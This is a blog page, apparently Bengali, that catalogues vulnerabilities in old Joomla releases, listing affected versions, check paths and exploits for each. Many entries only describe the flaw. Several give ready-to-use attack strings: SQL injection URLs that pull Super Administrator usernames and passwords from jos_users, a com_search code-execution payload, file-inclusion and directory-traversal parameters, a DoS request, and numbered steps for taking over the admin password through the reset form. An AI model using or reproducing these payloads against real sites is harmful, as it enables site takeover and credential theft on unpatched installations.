এক নজরে জুমলা ত্রুটি এবং এক্সপ্লয়েট

3
826
  • এক নজরে জুমলা ত্রুটি এবং এক্সপ্লয়েট

    Generic: Unprotected Administrator directory

    Unlimited Web Hosting
    Unlimited Web Hosting
    Unlimited Web Hosting
    Unlimited Web Hosting

    Versions Affected: Any

    Check: /administrator/

    Exploit: The default /administrator directory is detected. Attackers can bruteforce administrator accounts.

     

     

    Core: Multiple XSS/CSRF Vulnerability

    Versions Affected: 1.5.9 <=

    Check: /?1.5.9-x

    Exploit: A series of XSS and CSRF faults exist in the administrator application. Affected administrator components include com_admin, com_media, com_search. Both com_admin and com_search contain XSS vulnerabilities, and com_media contains 2 CSRF vulnerabilities.

     

     

    Core: JSession SSL Session Disclosure Vulnerability

    Versions effected: Joomla! 1.5.8 <=

    Check: /?1.5.8-x

    Exploit: When running a site under SSL (the entire site is forced to be under ssl), Joomla! does not set the SSL flag on the cookie. This can allow someone monitoring the network to find the cookie related to the session.

     

     

     

    Core: Frontend XSS Vulnerability

    Versions effected: 1.5.10 <=

    Check: /?1.5.10-x

    Exploit: Some values were output from the database without being properly escaped. Most strings in question were sourced from the administrator panel. Malicious normal admin can leverage it to gain access to super admin.

     

     

     

    Core: Missing JEXEC Check – Path Disclosure Vulnerability

    Versions effected: 1.5.11 <=

    Check: /libraries/phpxmlrpc/xmlrpcs.php

    Exploit: /libraries/phpxmlrpc/xmlrpcs.php

     

     

     

    Core: Missing JEXEC Check – Path Disclosure Vulnerability

    Versions effected: 1.5.12 <=

    Check: /libraries/joomla/utilities/compat/php50x.php

    Exploit: /libraries/joomla/utilities/compat/php50x.php

     

     

     

    Core: Frontend XSS – HTTP_REFERER not properly filtered Vulnerability

    Versions effected: 1.5.11 <=

    Check: /?1.5.11-x-http_ref

    Exploit: An attacker can inject JavaScript or DHTML code that will be executed in the context of targeted user browser, allowing the attacker to steal cookies. HTTP_REFERER variable is not properly parsed.

     

     

     

    Core: Frontend XSS – PHP_SELF not properly filtered Vulnerability

    Versions effected: 1.5.11 <=

    Check: /?1.5.11-x-php-s3lf

    Exploit: An attacker can inject JavaScript code in a URL that will be executed in the context of targeted user browser.

     

     

     

    Core: Authentication Bypass Vulnerability

    Versions effected: Joomla! 1.5.3 <=

    Check: /administrator/

    Exploit: Backend accepts any password for custom Super Administrator when LDAP enabled

     

     

     

    Core: Path Disclosure Vulnerability

    Versions effected: Joomla! 1.5.3 <=

    Check: /?1.5.3-path-disclose

    Exploit: Crafted URL can disclose absolute path

     

     

     

    Core: User redirected Spamming Vulnerability

    Versions effected: Joomla! 1.5.3 <=

    Check: /?1.5.3-spam

    Exploit: User redirect spam

     

     

     

    Core: joomla.php Remote File Inclusion Vulnerability

    Versions effected: 1.0.0

    Check: /includes/joomla.php

    Exploit: /includes/joomla.php?includepath=

     

     

     

    Core: Admin Backend Cross Site Request Forgery Vulnerability

    Versions effected: 1.0.13 <=

    Check: /administrator/

    Exploit: It requires an administrator to be logged in and to be tricked into a specially crafted webpage.

     

     

     

    Core: Path Disclosure Vulnerability

    Versions effected: Joomla! 1.5.12 <=

    Check: /libraries/joomla/utilities/compat/php50x.php

    Exploit: /libraries/joomla/utilities/compat/php50x.php

     

     

     

    CorePlugin: Xstandard Editor X_CMS_LIBRARY_PATH Local Directory Traversal Vulnerability

    Versions effected: Joomla! 1.5.8 <=

    Check: /plugins/editors/xstandard/attachmentlibrary.php

    Exploit: Submit new header X_CMS_LIBRARY_PATH with value ../ to /plugins/editors/xstandard/attachmentlibrary.php

     

     

     

    CoreTemplate: ja_purity XSS Vulnerability

    Versions effected: 1.5.10 <=

    Check: /templates/ja_purity/

    Exploit: A XSS vulnerability exists in the JA_Purity template which ships with Joomla! 1.5.

     

     

    CoreLibrary: phpmailer Remote Code Execution Vulnerability

    Versions effected: Joomla! 1.5.0 Beta/Stable

    Check: /libraries/phpmailer/phpmailer.php

    Exploit: N/A

     

     

     

    CorePlugin: TinyMCE TinyBrowser addon multiple vulnerabilities

    Versions effected: Joomla! 1.5.12

    Check: /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/

    Exploit: While Joomla! team announced only File Upload vulnerability, in fact there are many. See: http://www.milw0rm.com/exploits/9296

     

     

     

    CoreComponent: Joomla Remote Admin Password Change Vulnerability

    Versions Affected: 1.5.5 <=

    Check: /components/com_user/controller.php

    Exploit: 1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm 2. Write into field “token” char ‘ and Click OK. 3. Write new password for admin 4. Go to url : target.com/administrator/ 5. Login admin with new password

     

     

     

    CoreComponent: com_content SQL Injection Vulnerability

    Version Affected: Joomla! 1.0.0 <=

    Check: /components/com_content/

    Exploit: /index.php?option=com_content&task=blogcategory&id=60&Itemid=99999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72–

     

     

     

    CoreComponent: com_search Remote Code Execution Vulnerability

    Version Affected: Joomla! 1.5.0 beta 2 <=

    Check: /components/com_search/

    Exploit: /index.php?option=com_search&Itemid=1&searchword=%22%3Becho%20md5(911)%3B

     

     

     

    CoreComponent: com_admin File Inclusion Vulnerability

    Versions Affected: N/A

    Check: /administrator/components/com_admin/admin.admin.html.php

    Exploit: /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=

     

     

     

    CoreComponent: MailTo SQL Injection Vulnerability

    Versions effected: N/A

    Check: /components/com_mailto/

    Exploit: /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72–&Itemid=1

     

     

     

    CoreComponent: com_content Blind SQL Injection Vulnerability

    Versions effected: Joomla! 1.5.0 RC3

    Check: /components/com_content/

    Exploit: /index.php?option=com_content&view=%’ +’a’=’a&id=25&Itemid=28

     

     

     

    CoreComponent: com_content XSS Vulnerability

    Version Affected: Joomla! 1.5.7 <=

    Check: /components/com_content/

    Exploit: The defaults on com_content article submission allow entry of dangerous HTML tags (script, etc). This only affects users with access level Author or higher, and only if you have not set filtering options in com_content configuration.

     

     

     

    CoreComponent: com_weblinks XSS Vulnerability

    Version Affected: Joomla! 1.5.7 <=

    Check: /components/com_weblinks/

    Exploit: [Requires valid user account] com_weblinks allows raw HTML into the title and description tags for weblink submissions (from both the administrator and site submission forms).

     

     

     

    CoreComponent: com_mailto Email Spam Vulnerability

    Version Affected: Joomla! 1.5.6 <=

    Check: /components/com_mailto/

    Exploit: The mailto component does not verify validity of the URL prior to sending.

     

     

    CoreComponent: com_content view=archive SQL Injection Vulnerability

    Versions effected: Joomla! 1.5.0 Beta1/Beta2/RC1

    Check: /components/com_content/

    Exploit: Unfiltered POST vars – filter, month, year to /index.php?option=com_content&view=archive

     

     

     

    CoreComponent: com_content XSS Vulnerability

    Version Affected: Joomla! 1.5.9 <=

    Check: /components/com_content/

    Exploit: A XSS vulnerability exists in the category view of com_content.

     

     

     

    CoreComponent: com_installer CSRF Vulnerability

    Versions effected: Joomla! 1.5.0 Beta

    Check: /administrator/components/com_installer/

    Exploit: N/A

     

     

     

    CoreComponent: com_search Memory Comsumption DoS Vulnerability

    Versions effected: Joomla! 1.5.0 Beta

    Check: /components/com_search/

    Exploit: N/A

     

     

     

    CoreComponent: com_poll (mosmsg) Memory Consumption DOS Vulnerability

    Versions effected: 1.0.7 <=

    Check: /components/com_poll/

    Exploit: Send request /index.php?option=com_poll&task=results&id=14&mosmsg=DOS@HERE<<>AAA<><>

     

     

     

    CoreComponent: com_banners Blind SQL Injection Vulnerability

    Versions effected: N/A

    Check: /components/com_banners/

    Exploit: /index.php?option=com_banners&task=archivesection&id=0’+and+’1’=’1::/index.php?option=com_banners&task=archivesection&id=0’+and+’1’=’2

     

     

    CoreComponent: com_mailto timeout Vulnerability

    Versions effected: 1.5.13 <=

    Check: /components/com_mailto/

    Exploit: [Requires a valid user account] In com_mailto, it was possible to bypass timeout protection against sending automated emails

টিউনারপেজের নতুন টিউন আপনাকে ইমেইল করব?
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

3 মন্তব্য

একটি উত্তর ত্যাগ

Please enter your comment!
Please enter your name here

3 × 3 =